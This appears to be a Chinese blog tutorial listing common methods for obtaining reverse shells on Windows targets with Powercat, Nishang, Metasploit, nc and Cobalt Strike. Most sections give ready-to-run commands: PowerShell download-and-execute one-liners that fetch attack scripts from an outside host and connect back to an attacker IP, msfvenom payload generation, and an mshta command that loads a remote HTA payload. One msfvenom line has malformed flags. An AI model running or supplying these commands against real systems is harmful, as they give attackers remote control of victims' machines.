admin 管理员组

文章数量: 887019

目录

    • 一、Powercat反弹shell
    • 二、Nishang反弹shell
    • 三、UDP反弹shell
    • 四、Metasploit反弹shell
    • 五、nc反弹
    • 六、CS反弹

一、Powercat反弹shell

powercat下载: powercat.
powercat 是一个 函数。首先,需要先加载该函数,然后才能执行它。加载方式有两种:
其一:下载powercat.ps1至本地,并加载

其二:从URL加载
powershell IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.8.14/powercat.ps1')

攻击者开启监听

目标机cmd下执行反弹shell
powershell IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.8.14/powercat.ps1');powercat -c 192.168.110.128 -p 6677 -e cmd

攻击机查看反弹shell情况,反弹成功

二、Nishang反弹shell

Nishang下载: Nishang.
Nishang 是一个脚本和有效载荷的框架和集合,它支持使用 PowerShell 进行攻击性安全、渗透测试和红队。Nishang 在渗透测试的所有阶段都很有用。

攻击者开启监听

目标机cmd下执行反弹shell(Invoke-PowerShellTcp.ps1函数取至于/nishang-master/Shells目录下)
powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.8.14/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.110.128 -port 6666

攻击机上查看反弹情况,反弹成功

三、UDP反弹shell

利用方法同第二部分,利用/nishang/shells文件夹中的Invoke-PowerShellUdp.ps1文件

攻击机开启监听
nc -lvup 6677

目标机执行反弹shell
powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.8.14/Invoke-PowerShellUdp.ps1');Invoke-PowerShellUdp -Reverse -IPAddress 192.168.110.128 -port 6677


攻击机查看反弹成功

四、Metasploit反弹shell

方法一:
利用msfvenom制作.exe格式的反弹shell木马文件
msfvenom -p windows/meterpreter/reverse_tcp -l lhost=192.168.110.128 -p lport= 6677 -f exe -o 716.exe

攻击机开启监听

目标机上传716.exe,并执行

攻击机查看已建立连接

方法二:
使用 msfvenom -l 结合关键字过滤(如cmd/windows/reverse),找出我们需要的各类反弹一句话payload的路径信息。
msfvenom -l payload | grep 'cmd/windows/reverse'

使用如下的命令生成反弹一句话,然后复制粘贴到靶机上运行即可。
msfvenom -p cmd/windows/reverse_powershell lhost=192.168.110.128 lport=4444


攻击机开启监听

目标机cmd下执行反弹shell

查看攻击机反弹成功

五、nc反弹

攻击机开启监听

目标机执行反弹shell

攻击机查看反弹成功

六、CS反弹

攻击机开启监听

生成payload, Attacks---->Packages---->HTML Application



设置Host File

目的靶机上执行mshta http://192.168.8.137:80/download/file.ext


攻击机CS上查看建立连接

本文标签: 常见 方法 系统 Windows shell